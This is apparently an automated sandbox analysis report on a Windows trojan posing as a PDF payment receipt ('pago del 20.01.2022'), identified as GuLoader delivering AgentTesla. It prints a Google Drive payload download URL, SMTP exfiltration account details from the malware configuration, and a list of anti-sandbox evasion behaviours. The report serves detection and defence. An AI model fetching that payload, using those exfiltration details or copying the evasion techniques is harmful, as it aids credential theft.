Windows Analysis Report
pago del 20.01.2022.PDF______________________________________.exe

Overview

General Information

Sample Name: pago del 20.01.2022.PDF______________________________________.exe
Analysis ID: 558278
MD5: 4a3d98a8485779447c637caf1ccad892
SHA1: 972e617044f41500d54c0a9bc9304094fac5f1b4
SHA256: ab9d325dda36e6f2f7f74aa65c067a67d24b6247271b27d997520593b7105d7d
Infos:

Detection

AgentTesla GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: 00000011.00000000.336536519.00000000011B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downl"}
Source: CasPol.exe.6852.14.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "droidyandex@centraldefiltros.clicui4cu2@@mail.centraldefiltros.cldroidyandexreports@centraldefiltros.cl"}
Source: pago del 20.01.2022.PDF______________________________________.exe Virustotal: Detection: 17% Perma Link
Source: pago del 20.01.2022.PDF______________________________________.exe Metadefender: Detection: 23% Perma Link
Source: pago del 20.01.2022.PDF______________________________________.exe ReversingLabs: Detection: 64%

Compliance

barindex
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 216.58.205.78:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.3:49748 version: TLS 1.2

Networking

barindex
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=downl
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t5k36709iuadumo1ammtf5pl877g3aab/1642928325000/08383092466185559033/*/1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: CasPol.exe, 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000003.395397458.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.544557303.0000000001673000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp String found in binary or memory: http://mglNPC.com
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000003.395397458.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.544557303.0000000001673000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-6k-docs.googleusercontent.com/
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-6k-docs.googleusercontent.com/d
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000003.395397458.0000000001687000.00000004.00000001.sdmp, CasPol.exe, 00000011.00000002.544557303.0000000001673000.00000004.00000020.sdmp String found in binary or memory: https://doc-00-6k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t5k36709
Source: CasPol.exe, 00000011.00000003.375507665.0000000001687000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-6k-docs.googleusercontent.com/icrosoft
Source: CasPol.exe, 00000011.00000002.544445616.0000000001639000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000011.00000002.544445616.0000000001639000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/h
Source: CasPol.exe, 00000011.00000002.544230735.00000000013B0000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9
Source: pago del 20.01.2022.PDF______________________________________.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000011.00000002.548336072.000000001E151000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/t5k36709iuadumo1ammtf5pl877g3aab/1642928325000/08383092466185559033/*/1BKTAGEWv-q5Ke_0MnBa_Ml90CTgLrdi9?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-6k-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 216.58.205.78:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.3:49748 version: TLS 1.2

System Summary

barindex
Source: 00000000.00000000.274115774.000000000040B000.00000020.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000000.00000002.381759640.000000000040B000.00000020.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: initial sample Static PE information: Filename: pago del 20.01.2022.PDF______________________________________.exe
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000000.274115774.000000000040B000.00000020.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000000.00000002.381759640.000000000040B000.00000020.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00411CB2 0_2_00411CB2
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00411002 0_2_00411002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 17_2_011BE5B1 17_2_011BE5B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 17_2_1DF546A0 17_2_1DF546A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 17_2_1DF54690 17_2_1DF54690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 17_2_1DF54630 17_2_1DF54630
Source: pago del 20.01.2022.PDF______________________________________.exe, 00000000.00000000.274138030.0000000000429000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDYPPEDES.exe vs pago del 20.01.2022.PDF______________________________________.exe
Source: pago del 20.01.2022.PDF______________________________________.exe Binary or memory string: OriginalFilenameDYPPEDES.exe vs pago del 20.01.2022.PDF______________________________________.exe
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: invalid certificate
Source: pago del 20.01.2022.PDF______________________________________.exe Virustotal: Detection: 17%
Source: pago del 20.01.2022.PDF______________________________________.exe Metadefender: Detection: 23%
Source: pago del 20.01.2022.PDF______________________________________.exe ReversingLabs: Detection: 64%
Source: pago del 20.01.2022.PDF______________________________________.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe File created: C:\Users\user\AppData\Local\Temp\~DFFEBBC1DFDEDF80CA.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@16/1@2/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6968:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: Yara match File source: 00000011.00000000.336536519.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00412C60 push ds; retf 0_2_00412C6E
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00412D6F push es; iretd 0_2_00412D77
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_004141C2 push esi; retf 0_2_004141C5
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00412988 push eax; iretd 0_2_00412989
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_00412727 push ebx; retf 0_2_00412771
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_004027E4 push esi; ret 0_2_004027E5
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_004123E9 push esp; iretd 0_2_004123EA
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_0233069D push ss; retf 0_2_0233069E
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_02333289 push esi; ret 0_2_0233328C
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_0233192E push ebx; retf 0_2_02331933
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_02332916 push ebx; retf 0_2_02332929
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_02335574 push esi; ret 0_2_02335575
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Code function: 0_2_023345C5 push edi; retf 0_2_023345C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 17_2_1DF57751 push ds; ret 17_2_1DF57760

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknown Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe"
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process created: "C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe" Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\pago del 20.01.2022.PDF______________________________________.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
